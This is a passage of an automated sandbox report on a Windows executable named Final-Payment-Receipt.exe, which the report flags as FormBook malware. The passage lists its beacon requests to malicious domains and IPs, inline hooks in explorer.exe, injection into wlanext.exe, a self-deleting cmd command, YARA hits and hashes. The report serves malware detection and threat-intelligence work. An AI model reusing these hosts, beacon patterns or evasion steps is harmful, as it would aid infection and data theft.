          http://www.trumpingitagain.com/71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.wacrox.com | 162.0.236.49 | true | true | | unknown
          themindofafunnygirl.com | 192.0.78.230 | true | true | | unknown
          trumpingitagain.com | 27.123.27.33 | true | true | | unknown
          g.msn.com | unknown | unknown | false | | high
          www.themindofafunnygirl.com | unknown | unknown | true | | unknown
          www.azarblock.com | unknown | unknown | true | | unknown
          www.trumpingitagain.com | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.wacrox.com/71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr | true | Avira URL Cloud: safe | unknown
          http://www.trumpingitagain.com/71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr | true | Avira URL Cloud: safe | unknown
          http://www.themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr | true | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries


                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
27.123.27.33 | unknown | Australia | 38719 | DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | true
192.0.78.230 | unknown | United States | 2635 | AUTOMATTICUS | true
162.0.236.49 | unknown | Canada | 22612 | NAMECHEAP-NETUS | true

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:320833
                                              Start date:19.11.2020
                                              Start time:22:18:38
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 8s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:Final-Payment-Receipt.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:22
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@7/1@5/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 10% (good quality ratio 9.2%)
                                              • Quality average: 75.1%
                                              • Quality standard deviation: 30.2%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 99
                                              • Number of non-executed functions: 188
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.210.248.85, 51.11.168.160, 40.88.32.150, 20.54.26.129, 52.230.222.68, 2.20.142.210, 2.20.142.209, 52.142.114.176, 92.122.213.194, 92.122.213.247, 51.104.144.132
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, dm3p.wns.notify.windows.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net

                                              Simulations

                                              Behavior and APIs

Time | Type | Description
22:19:29 | API Interceptor | 1x Sleep call for process: Final-Payment-Receipt.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN


                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Final-Payment-Receipt.exe.log
                                              Process:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1314
                                              Entropy (8bit):5.350128552078965
                                              Encrypted:false
                                              SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                              MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                              SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                              SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                              SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.806563272516785
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:Final-Payment-Receipt.exe
                                              File size:552448
                                              MD5:8f5d29001a9f5d4f62b47af6442be5ab
                                              SHA1:4838464ffe421aad7c9d73ba19420b7e9c2c427d
                                              SHA256:8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
                                              SHA512:8457a4d90e4777439aa5415d656535a6701428919981885ffd2a9fd82b7be8f0e5dff2d206f74aadef358b5988fc805e910f5da18d99f681efde918d2ed93302
                                              SSDEEP:12288:FE2YwhOTAtvmsADL5L3cAHczt8W+GKOfbn78g:FXD8ktmsMLMBPj78g
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P..d............... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x4882da
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x5FB5D6C8 [Thu Nov 19 02:22:00 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]

                                              Data Directories

                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x88288 | 0x4f | .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8a000 | 0x59c | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8c000 | 0xc | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                              Sections

                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x2000 | 0x862e0 | 0x86400 | False | 0.871959380819 | data | 7.8171947974 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc | 0x8a000 | 0x59c | 0x600 | False | 0.419270833333 | data | 4.06876160117 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0x8c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              Name | RVA | Size | Type | Language | Country
                                              RT_VERSION | 0x8a090 | 0x30c | data | |
                                              RT_MANIFEST | 0x8a3ac | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                              Imports

                                              DLL | Import
                                              mscoree.dll | _CorExeMain

                                              Version Infos

                                              Description | Data
                                              Translation | 0x0000 0x04b0
                                              LegalCopyright | Copyright 2014
                                              Assembly Version | 1.0.0.0
                                              InternalName | F5NI.exe
                                              FileVersion | 1.0.0.0
                                              CompanyName |
                                              LegalTrademarks |
                                              Comments |
                                              ProductName | Blackjack
                                              ProductVersion | 1.0.0.0
                                              FileDescription | Blackjack
                                              OriginalFilename | F5NI.exe

                                              Network Behavior

                                              TCP Packets


                                              UDP Packets


                                              DNS Queries

                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                              Nov 19, 2020 22:20:17.573630095 CET | 192.168.2.5 | 8.8.8.8 | 0xc1b0 | Standard query (0) | g.msn.com | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:20:26.929465055 CET | 192.168.2.5 | 8.8.8.8 | 0x34c1 | Standard query (0) | www.wacrox.com | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:20:47.608442068 CET | 192.168.2.5 | 8.8.8.8 | 0x15ec | Standard query (0) | www.trumpingitagain.com | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:21:08.422624111 CET | 192.168.2.5 | 8.8.8.8 | 0x4070 | Standard query (0) | www.azarblock.com | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:21:28.816133976 CET | 192.168.2.5 | 8.8.8.8 | 0x82a5 | Standard query (0) | www.themindofafunnygirl.com | A (IP address) | IN (0x0001)

                                              DNS Answers

                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                              Nov 19, 2020 22:20:17.624994993 CET | 8.8.8.8 | 192.168.2.5 | 0xc1b0 | No error (0) | g.msn.com | g-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
                                              Nov 19, 2020 22:20:26.968744040 CET | 8.8.8.8 | 192.168.2.5 | 0x34c1 | No error (0) | www.wacrox.com | | 162.0.236.49 | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:20:47.664834976 CET | 8.8.8.8 | 192.168.2.5 | 0x15ec | No error (0) | www.trumpingitagain.com | trumpingitagain.com | | CNAME (Canonical name) | IN (0x0001)
                                              Nov 19, 2020 22:20:47.664834976 CET | 8.8.8.8 | 192.168.2.5 | 0x15ec | No error (0) | trumpingitagain.com | | 27.123.27.33 | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:21:08.462667942 CET | 8.8.8.8 | 192.168.2.5 | 0x4070 | Name error (3) | www.azarblock.com | none | none | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET | 8.8.8.8 | 192.168.2.5 | 0x82a5 | No error (0) | www.themindofafunnygirl.com | themindofafunnygirl.com | | CNAME (Canonical name) | IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET | 8.8.8.8 | 192.168.2.5 | 0x82a5 | No error (0) | themindofafunnygirl.com | | 192.0.78.230 | A (IP address) | IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET | 8.8.8.8 | 192.168.2.5 | 0x82a5 | No error (0) | themindofafunnygirl.com | | 192.0.78.148 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.wacrox.com
                                              • www.trumpingitagain.com
                                              • www.themindofafunnygirl.com

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.5 | 49730 | 162.0.236.49 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Nov 19, 2020 22:20:27.149298906 CET | 5719 | OUT | GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.wacrox.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:20:27.391788006 CET | 5720 | IN | HTTP/1.1 404 Not Found
                                              Date: Thu, 19 Nov 2020 21:20:27 GMT
                                              Server: Apache/2.4.29 (Ubuntu)
                                              Content-Length: 327
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /71m/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              1 | 192.168.2.5 | 49731 | 27.123.27.33 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Nov 19, 2020 22:20:47.953753948 CET | 5721 | OUT | GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.trumpingitagain.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:20:48.246388912 CET | 5721 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 19 Nov 2020 21:20:48 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              2 | 192.168.2.5 | 49733 | 192.0.78.230 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Nov 19, 2020 22:21:28.875543118 CET | 5733 | OUT | GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.themindofafunnygirl.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:21:28.891923904 CET | 5733 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Thu, 19 Nov 2020 21:21:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr
                                              X-ac: 2.hhn
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function Name | Hook Type | Active in Processes
                                              PeekMessageA | INLINE | explorer.exe
                                              PeekMessageW | INLINE | explorer.exe
                                              GetMessageW | INLINE | explorer.exe
                                              GetMessageA | INLINE | explorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function Name | Hook Type | New Data
                                              PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEE
                                              PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEE
                                              GetMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEE
                                              GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEE

                                              System Behavior

                                              General

                                              Start time:22:19:28
                                              Start date:19/11/2020
                                              Path:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
                                              Imagebase:0x10000
                                              File size:552448 bytes
                                              MD5 hash:8F5D29001A9F5D4F62B47AF6442BE5AB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:22:19:31
                                              Start date:19/11/2020
                                              Path:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Imagebase:0x8d0000
                                              File size:552448 bytes
                                              MD5 hash:8F5D29001A9F5D4F62B47AF6442BE5AB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:22:19:33
                                              Start date:19/11/2020
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff693d90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:22:19:41
                                              Start date:19/11/2020
                                              Path:C:\Windows\SysWOW64\wlanext.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\wlanext.exe
                                              Imagebase:0xe10000
                                              File size:78848 bytes
                                              MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:22:19:46
                                              Start date:19/11/2020
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
                                              Imagebase:0x150000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:22:19:47
                                              Start date:19/11/2020
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7ecfc0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis


                                                Executed Functions

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 008B6BF8
                                                • GetCurrentThread.KERNEL32 ref: 008B6C35
                                                • GetCurrentProcess.KERNEL32 ref: 008B6C72
                                                • GetCurrentThreadId.KERNEL32 ref: 008B6CCB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 7da594c495190c8fc96f988a07b9c9880318f4477a4b70481d698448397af6ed
                                                • Instruction ID: 6011c091d123a8542dae27b28cfdcab71bcfb93afe858881343de7ff206e4678
                                                • Opcode Fuzzy Hash: 7da594c495190c8fc96f988a07b9c9880318f4477a4b70481d698448397af6ed
                                                • Instruction Fuzzy Hash: 365153B09002498FDB14CFA9DA88BDEBFF0FF88314F248459E559A7361D7759884CB25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 008B6BF8
                                                • GetCurrentThread.KERNEL32 ref: 008B6C35
                                                • GetCurrentProcess.KERNEL32 ref: 008B6C72
                                                • GetCurrentThreadId.KERNEL32 ref: 008B6CCB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 7394c3476aeee8776189f3f6acad7d143b04a41d2f0eec7c443375d0f5fefab0
                                                • Instruction ID: 54c5d74d87e5c367d3c3a94956917965366d64c45030aecd5886242d424c6925
                                                • Opcode Fuzzy Hash: 7394c3476aeee8776189f3f6acad7d143b04a41d2f0eec7c443375d0f5fefab0
                                                • Instruction Fuzzy Hash: 205153B09002498FDB14CFA9DA88BDEBBF0FF88314F248459E529A7350D775A884CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 055E983E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
